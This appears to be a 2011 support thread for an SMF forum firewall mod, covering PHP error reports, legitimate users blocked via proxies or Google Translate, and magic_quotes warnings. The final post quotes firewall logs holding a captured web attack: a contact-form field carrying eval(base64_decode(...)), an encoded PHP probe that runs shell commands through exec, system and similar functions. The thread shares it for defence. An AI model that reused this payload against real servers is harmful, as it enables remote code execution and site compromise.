News:

Bored?  Looking to kill some time?  Want to chat with other SMF users?  Join us in IRC chat or Discord

Main Menu

Forum Firewall

Started by butchs, January 15, 2011, 11:00:37 AM

Previous topic - Next topic

MCK

Quote from: butchs on February 11, 2011, 02:17:06 AM
Yea.  This is why it is administrator editable,  I was hoping admins would share new list items as they see them.   They cab found at sites that I prefer not to mention here.  In either event, when an update is found all you need to do is type it in the list.
:P

Thanks for confirming the ability to insert the updates in to the settings window. Would you consider offering settings updates on a periodic or as needed basis to your donating users? Since you know where to look and how to spot the new exploits as you know how to translate these into settings that should go into Forum FireWall I think you are best positioned to distribute these updates when needed. Would you consider this as a service please? As I see it, the FF-Mod is great as is and very capable but I'm afraid over time it will become irrelevant as the script-kiddies will move on to newer & different exploits. Sort of like running an anti-virus tool on your PC with no regular definition updates coming down. Thanks for considering this.

DarkBlizz

alright I'll look into that.  Another question, any idea how to fix this errors:


Quotehttp://darkblizz.org/Forum2/index.php?pretty;action=profile&u=8426
8: Undefined index: host
File: /home/fluffybu/public_html/Forum2/Sources/ForumFirewall.php
Line: 279


276: // Check only if from different hosts
277: $referer_parts = array();
278: $referer_parts = parse_url($forumfirewall_data['referer']);
==>279: if($referer_parts['host'] != forumfirewall_get_env('HTTP_HOST')) {
280: $referer_attack = array();
281: $referer_attack = explode('|', $modSettings['forumfirewall_referer_attack']);
282: @$visitor_referer = queryspecialchars($forumfirewall_data['referer']);
283: foreach ($referer_attack as $attacks) {



Quotehttp://darkblizz.org/Forum2/index.php?action=dlattach;attach=72;type=avatar
8: Undefined offset: 1
File: /home/fluffybu/public_html/Forum2/Sources/ForumFirewall.php
Line: 110

Quotehttp://darkblizz.org/Forum2/index.php?action=dlattach;attach=72;type=avatar
8: Undefined offset: 2
File: /home/fluffybu/public_html/Forum2/Sources/ForumFirewall.php
Line: 107


//  check for dos
if ($dos_cond !== false) {
$time_diff =  '';
Line 107= $time_diff = (time() - $result[2]);

if ($time_diff >= 20) {  //  Min 20 seconds for test
Line 110= if  ((($result[1] + 1)/$time_diff) >= $modSettings['forumfirewall_trigger']) {
//  Fail dos test
$result[0] = '3';
forumfirewall_block($forumfirewall_data, $result);
return;
} } } } }


Quotehttp://darkblizz.org/Forum2/index.php?pretty;action=register2
2: htmlspecialchars() expects parameter 1 to be string, array given
File: /home/fluffybu/public_html/Forum2/Sources/Subs-ForumFirewall.php
Line: 1045


1028: // Insert a new record modified for SMF 2.0 RC2
1029: function forumfirewall_insert($forumfirewall_data, $result) {
1030: global $txt, $modSettings, $db_prefix, $smcFunc;
1031:
1032: if (empty($forumfirewall_data)) return;
1033: if (!is_array($forumfirewall_data)) return;
1034: if (empty($result)) return;
1035:
1036: $request = $headers = $forumfirewall_ip = $request_method = '';
1037: $request_uri = $server_protocol = $user_agent = $referer = '';
1038:
1039:   $forumfirewall_ip = $forumfirewall_data['visitor_ip'];
1040: if (empty($forumfirewall_data['request_entity']))
1041: $request_method = $forumfirewall_data['request_method'];
1042: else {
1043: $request_method = $forumfirewall_data['request_method'];
1044: foreach ($forumfirewall_data['request_entity'] as $h => $v) {
==>1045: request_method .= htmlspecialchars($h) . ": " . htmlspecialchars($v) . "\n\r"; }
1046: unset($v);
1047: }
1048: $request_uri = $forumfirewall_data['request_uri'];
1049: $server_protocol = $forumfirewall_data['server_protocol'];
1050: $user_agent = $forumfirewall_data['user_agent'];


~thanks

butchs

Quote from: DarkBlizz on February 11, 2011, 12:04:20 PM
alright I'll look into that.  Another question, any idea how to fix this errors:

What version FF do you have?
I have been truly inspired by the SUGGESTIONS as I sit on my throne and contemplate the wisdom imposed upon me.

DarkBlizz


butchs

#184
You do not have to post the code.  The mod should work fine but I will add them to the to do list.  Let me know if any of them repeat.
I have been truly inspired by the SUGGESTIONS as I sit on my throne and contemplate the wisdom imposed upon me.

MCK

Hi Butchs, one of my Global Moderators is getting blocked with the following message : Request Entity Attack: %26!

I think he is connecting from his iPhone so I see the chances of his device being infected with malware low. Detail is below. Any thoughts on what I should do to resolve this issue? I am trying the Whitelist group idea in the meanwhile. Thanks for your help.

POSTtopic: 0 subject: History of Roland Guitar Synthesizers icon: xx sel_face: sel_size: sel_color: message: Many GK-13 products mentioned in this brief history of Roland Guitar Synthesizers: Translated by google http://translate.google.com/translate?hl=en&sl=ja&u=http://www.ikebe-gakki.com/web-ikebe/grandy_GR-GK/index.html&prev=/search%3Fq%3Dikebe%2Bgakki%2Bibanez%2Bguitar%26hl%3Den%26client%3Dsafari%26prmd%3Divnsfd&rurl=translate.google.com&twu=1 message_mode: 0 notify: 0 lock: 0 sticky: 0 move: 0 additional_options: 0 f0a59ef24: c90098bec7e35c7a28b76a041e23de20 seqnum: 12532999 /smf/index.php?action=post2;start=0;board=65 HTTP/1.1 Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 http://www.vguitarforums.com/smf/index.php?action=post;board=65.0   

butchs

He is accessing the site via a third party application "google translate".  The mod was not designed with that in mind.
I have been truly inspired by the SUGGESTIONS as I sit on my throne and contemplate the wisdom imposed upon me.

MCK

Ok. I'll ask him if he can try going direct. I thought he did too but I'll check.

Meanwhile I have another problem. Legit user in New Zealand is coming through with broken IP so he is getting blocked. I tried the whitelist trick but this didn't work since he doesn't get that far into the system. So technically the f/w is doing its job. I just need to find out why he is coming through like this. When he checks his ip with http://www.whatismyip.com/ it is reported properly and it is 222.153.66.36.  He tried connecting with Linux, Win7 etc no change. He tried to reset his router and flush DNS and force new IP and that did not change a thing either.

Have you ever seen something like this? Thanks for any guidance you might have for me.

1.1   
GET /smf/index.php?board=84.0 HTTP/1.1 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MATP) http://www.vguitarforums.com/smf/index.php?action=post;topic=3099.0;last_msg=19919   
Invalid ip!

1.1   
GET /smf/index.php?board=84.0 HTTP/1.1 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MATP) http://www.vguitarforums.com/smf/index.php?action=post;topic=3099.0;last_msg=19919   
Invalid ip in Proxy list!

1.1   
POSTuser: gumtown passwrd: cookielength: -1 hash_passwrd: deleted /smf/index.php?action=login2 HTTP/1.1 Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.10 (maverick) Firefox/3.6.13 http://www.vguitarforums.com/smf/index.php?board=60.0   
Invalid ip!

1.1   
POSTuser: gumtown passwrd: cookielength: -1 hash_passwrd: deleted /smf/index.php?action=login2 HTTP/1.1 Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.10 (maverick) Firefox/3.6.13 http://www.vguitarforums.com/smf/index.php?board=60.0   
Invalid ip in Proxy list!

butchs

It looks like he is using a proxy that is hiding his ip or changing it.  He should try another proxy.
I have been truly inspired by the SUGGESTIONS as I sit on my throne and contemplate the wisdom imposed upon me.

MCK

Ok. Will ask him about it but if that is the case wouldn't http://www.whatismyip.com/ see the same 1.1?

butchs

Nope.  If he is using a proxy that has been miss-configured or set-up to spam he will get blocked.  Please do not try to force me to explain, doing so is a security risk.
I have been truly inspired by the SUGGESTIONS as I sit on my throne and contemplate the wisdom imposed upon me.

MCK

Sure thing. I understand. Will collect as much info as possible and pass on to you via PM if need be. Thanks for your help.

intervention

In the ACP when i go to Forum Firewall>Settings there is a message at the top that says this,
SECURITY RISK: MAGIC_QUOTES ARE ON!
What exactly does this mean and how can i fix it? Any help would be very appreciated!

butchs

#193
The mod detects them and warns about them it is up to you to decide what to do.  Its use is controversial and it can cause slow downs.  EDIT:  SMF RC5 SSI.PHP TRIES TO TURN THEM OFF.

More info here.

"MAGIC_QUOTES" are set in your "php.ini" and are not required by the default SMF package.  If you have the ability, you can turn them off.  Many hosts set them and if you want them off try to be desecrate because some of them are paranoid.
I have been truly inspired by the SUGGESTIONS as I sit on my throne and contemplate the wisdom imposed upon me.

butchs

Upgrade to 2.0 RC5 and 1.1.13 (the lucky old one) and some bug fixes!
:)
I have been truly inspired by the SUGGESTIONS as I sit on my throne and contemplate the wisdom imposed upon me.

MCK

I chose to remain at RC4 and apply the security patch for now. Your new release would still be compatible right?

butchs

I have been truly inspired by the SUGGESTIONS as I sit on my throne and contemplate the wisdom imposed upon me.

MCK

Quote from: butchs on February 13, 2011, 09:17:48 AM
Yes.

Thanks for your very prompt reply! Amazing support for your mod. Keep well.

ljunatic

I see the update for 1.1.13 is out. THANKS!


Should I uninstall and reinstall to get the upgrade?

MCK

Seeing some new type of attacks in my logs that I didn't see before.  In case this is of interest.

Request Entity Attack: base64_decode!

Detail : 81.94.196.51
POSTsend-contactus: 1 author_name: eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));die; /smf/index.php//contact.php HTTP/1.0 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6

------------ next one below

Hack: cache!

Detail : 72.50.83.89
POST /smf/mobiquo/mobiquo.php?nocache=634331980101810000 HTTP/1.0 NativeHost file:///Applications/Install/9A096F03-F1DA-DF11-A844-00237DE2DB9E/Install/

Advertisement: